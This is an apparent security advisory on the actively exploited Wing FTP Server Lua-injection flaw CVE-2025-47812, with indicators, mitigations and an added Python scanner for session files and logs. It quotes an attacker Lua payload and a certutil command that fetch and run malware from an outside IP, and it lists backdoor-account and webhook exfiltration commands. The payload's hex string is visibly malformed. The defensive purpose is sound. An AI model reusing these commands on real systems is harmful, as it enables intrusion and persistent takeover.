A newly discovered critical vulnerability is currently being actively exploited across thousands of publicly accessible servers. Identified as CVE-2025-47812 with a maximum CVSS score of 10.0, this flaw affects Wing FTP Server, a widely used cross-platform file transfer solution. The vulnerability allows remote attackers to inject arbitrary Lua code into server session files through manipulated login parameters. Once saved, the malicious code is automatically executed with root or SYSTEM-level privileges upon a regular page request. G.Business reports this, citing analyses by Huntress and The Hacker News.
Root Cause and Attack Vector
The vulnerability arises from improper handling of null bytes (`\0`) in the username field submitted to the web interface's `loginok.html` endpoint. By terminating the string early using `%00`, attackers can append executable Lua code that gets written to session files. Since these `.lua` session files are deserialized by default when accessing internal pages (e.g. `dir.html`), any injected code is immediately executed by the server process.
Exploitation in the Wild: Tactics and Commands
Security firm Huntress observed the first exploit attempts on July 1, 2025, just one day after public disclosure. The following tactics were documented:
Session Injection Payload (Lua Example):
```lua
_SESSION['username']=[[anonymous]]
local function hx(s)
return (s:gsub('..', function(x) return string.char(tonumber(x,16)) end))
end
local cmd = hx("636572747574696c202d6620687474703a2f2f185.196.9.225:8080/payload.exe")
local h = io.popen(cmd)
local r = h:read("*a")
h:close()
--]]
```
Decoded system command:
```cmd
certutil -urlcache -f http://185.196.9.225:8080/payload.exe %TEMP%\malware.exe
start /B %TEMP%\malware.exe
```
Commands Run by Attackers (Observed Behavior)
After gaining code execution, attackers performed:
System Reconnaissance:
```cmd
whoami
ipconfig
nslookup
arp -a
```
User Enumeration and Backdoor Setup:
```cmd
net user wingftp 123123qweqwe /add
net localgroup administrators wingftp /add
```
Network Test and Payload Retrieval:
```cmd
curl -s -d con https://webhook.site/5d112487... > nul
powershell -c get-childitem c: | out-file c:\dir.txt
```
MSI-based Tool Deployment:
Attackers downloaded ScreenConnect installers using Lua-encoded scripts.
Indicators of Compromise (IOCs)
| Type | Value |
|---|---|
| IP Addresses | 185.196.9.225, 223.160.131.104, 149.248.44.88 |
| Malicious URL | http://185.196.9.225:8080/EOp45eWLSp5G5Uwp_yOCiQ |
| SHA256 | c637ec00bd22da4539ec6def89cd9f7196a303d17632b1131a89d65e4f5698f4 |
| Webhook | https://webhook.site/5d112487-6133-4942-ac87-3f473d44bd81 |
| Usernames | wing, wingftp |
| Passwords | 123123qweqwe, 123123qweqweqwe |
Files and Logs to Inspect
Suspicious `.lua` Session Files:
Location: `C:\Program Files (x86)\Wing FTP Server\session\`
Look for:
- Lua files larger than 1 KB
- Code with `io.popen`, `hx()`, or embedded hex blobs
Log Entry Example (Truncated Username):
Location: `C:\Program Files (x86)\Wing FTP Server\Log\Domains\<yourdomain>\`
Log entry:
```text
User 'anonymous
```
This indicates that the username was cut off due to null-byte termination.
Affected Versions and Patch Status
All versions of Wing FTP Server prior to 7.4.4 are affected. Version 7.4.4 was released on May 14, 2025, and includes a fix for CVE-2025-47812. However, thousands of instances remain unpatched, particularly in environments where automated updates are disabled.
Mitigation Steps for System Administrators
- Patch Immediately: Upgrade to Wing FTP Server v7.4.4 or later.
- Inspect Session Files: Look for `.lua` files containing suspicious embedded logic.
- Disable Anonymous FTP Access: Unless explicitly needed for public services.
- Restrict Web Interface: Use firewalls or VPN to protect the HTTP/HTTPS interface.
- Search for Backdoor Accounts: Check for `wing` and `wingftp` users created recently.
- Review Logs for Truncated Login Entries: `User 'anonymous` (without closing quote) indicates null-byte abuse.
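The session-file heuristics and the truncated-login log check from the "Files and Logs to Inspect" section and the mitigation list above, as an added Python hunt script that is not part of the article or of Wing FTP Server. The session directory is the default path quoted in the article; the marker regexes, the log-line format and the sample session files are constructed assumptions.

```python
import re
from pathlib import Path

# Heuristics from the article: session files over 1 KB, io.popen, an hx() helper,
# or long embedded hex blobs. SESSION_DIR is the default path quoted in the article.
SESSION_DIR = Path(r"C:\Program Files (x86)\Wing FTP Server\session")
SIZE_LIMIT = 1024
MARKERS = {
    "io.popen": re.compile(r"io\.popen\s*\("),
    "hx() helper": re.compile(r"\bhx\s*\("),
    "hex blob": re.compile(r"['\"]([0-9a-fA-F]{2}){16,}"),  # 16+ hex bytes in a literal
}
# A healthy login line closes the quoted username; a NUL-truncated one never does.
TRUNCATED_USER = re.compile(r"User '[^']*$")

def scan_session_text(text: str) -> list:
    """Return the reasons a session file looks tampered with (empty list = clean)."""
    findings = []
    size = len(text.encode("utf-8"))
    if size > SIZE_LIMIT:
        findings.append(f"size {size} B exceeds {SIZE_LIMIT} B")
    for label, pattern in MARKERS.items():
        if pattern.search(text):
            findings.append(label)
    return findings

def scan_session_dir(directory: Path = SESSION_DIR) -> dict:
    """Scan every .lua session file; map file name -> findings for flagged files."""
    flagged = {}
    for path in directory.glob("*.lua"):
        findings = scan_session_text(path.read_text(errors="replace"))
        if findings:
            flagged[path.name] = findings
    return flagged

def find_truncated_logins(lines) -> list:
    """1-based numbers of log lines whose quoted username is never closed."""
    return [n for n, line in enumerate(lines, 1) if TRUNCATED_USER.search(line.rstrip())]

# Constructed fixtures (not real Wing FTP data) so the checks run offline.
CLEAN_SESSION = "_SESSION['username']=[[alice]]\n"
TAMPERED_SESSION = (
    "_SESSION['username']=[[anonymous]]\n"
    "local cmd = hx('" + "41" * 20 + "')\n"   # hex blob passed to the hx() helper
    "local h = io.popen(cmd)\n"
)
SAMPLE_LOG = [
    "[2025-07-01 10:00:01] User 'alice' logged in from 10.0.0.5",
    "[2025-07-01 10:00:07] User 'anonymous",   # cut off by the null byte
    "[2025-07-01 10:00:09] User 'bob' logged out",
]
```

Run `scan_session_dir()` on the server itself and `find_truncated_logins(open(logfile))` on each domain log; any flagged file or line is a candidate for the incident-response steps above.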
Security Best Practices
| Area | Recommendation |
|---|---|
| Web Access | Restrict interface to internal network or VPN |
| Log Monitoring | Enable SIEM rules for session and log directories |
| File Integrity | Monitor session files for changes or Lua logic |
| Threat Intel | Block known IPs and payload URLs at firewall |
| User Management | Audit all FTP users for unexpected accounts |
Global Exposure
Based on Censys data:
- Over 8,000 Wing FTP servers are publicly accessible.
- Over 5,000 expose their web interface.
- Affected countries include the United States, Germany, UK, India, China.
The simplicity of the exploit, combined with high privilege access and a wide attack surface, places many organizations — particularly small hosting providers and mid-sized enterprises — at high risk.
CVE-2025-47812 represents a critical and actively exploited threat vector that requires immediate attention. The combination of unauthenticated access, automatic Lua code execution, and persistent control via backdoor creation makes this vulnerability one of the most severe seen in a production FTP solution in recent years.
Organizations using Wing FTP Server should patch immediately, audit logs and session files, and implement long-term access controls to prevent similar exploits in the future.